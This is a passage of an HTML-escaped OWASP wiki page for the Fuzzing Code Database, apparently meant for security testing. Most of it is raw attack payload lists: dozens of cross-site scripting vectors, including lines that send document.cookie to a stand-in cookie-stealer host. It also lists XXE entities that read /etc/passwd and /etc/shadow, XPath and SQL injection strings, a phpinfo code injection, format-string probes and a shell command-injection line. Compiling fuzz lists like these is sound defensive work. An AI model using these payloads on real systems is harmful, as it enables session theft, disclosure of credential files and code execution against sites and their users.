&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
